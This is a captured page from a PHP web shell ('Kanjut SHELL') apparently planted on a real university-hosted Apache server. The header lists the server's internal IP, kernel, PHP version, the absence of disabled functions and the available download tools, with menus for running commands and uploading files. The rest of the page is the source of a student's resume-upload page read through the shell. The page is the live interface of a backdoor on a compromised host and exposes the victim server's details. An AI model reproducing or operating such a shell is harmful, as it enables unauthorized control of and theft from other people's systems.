Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.221.167.11
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/bdstamour/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/bdstamour/www/Resume.php
<?php
	session_start();
	if (isset($_SESSION['username']))
	{
?>

<HEAD>
<TITLE> FirstStep
</TITLE><link rel="stylesheet" type="text/css" href="research.css">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</HEAD>
<CENTER>
<H2>
Resume
</HEAD></H2><HR>
<BODY>
<Form action=ResumeAction.php method=post enctype="multipart/form-data">
Upload a resume:
<input type="file" name="uploaded_file"><br>
<input type="submit" value="Upload file">
</Form>
<p>
View your <A HREF=ResumeDownload.php>resume.</A>
<p><p><p>

<?php
	}
	else
	{
?>
<CENTER>
<?php
		print "You are not logged in. Please <A HREF=FirstStepIndex.php>login.</A><p>";
		print "<A HREF=NewUser.php>Not registered?  Let's get started!</A><p>";
	}
?>
<HR>
<?php
		include("date.php");
?>
</HTML>
</CENTER>
</BODY>

Stv3n404 - 2023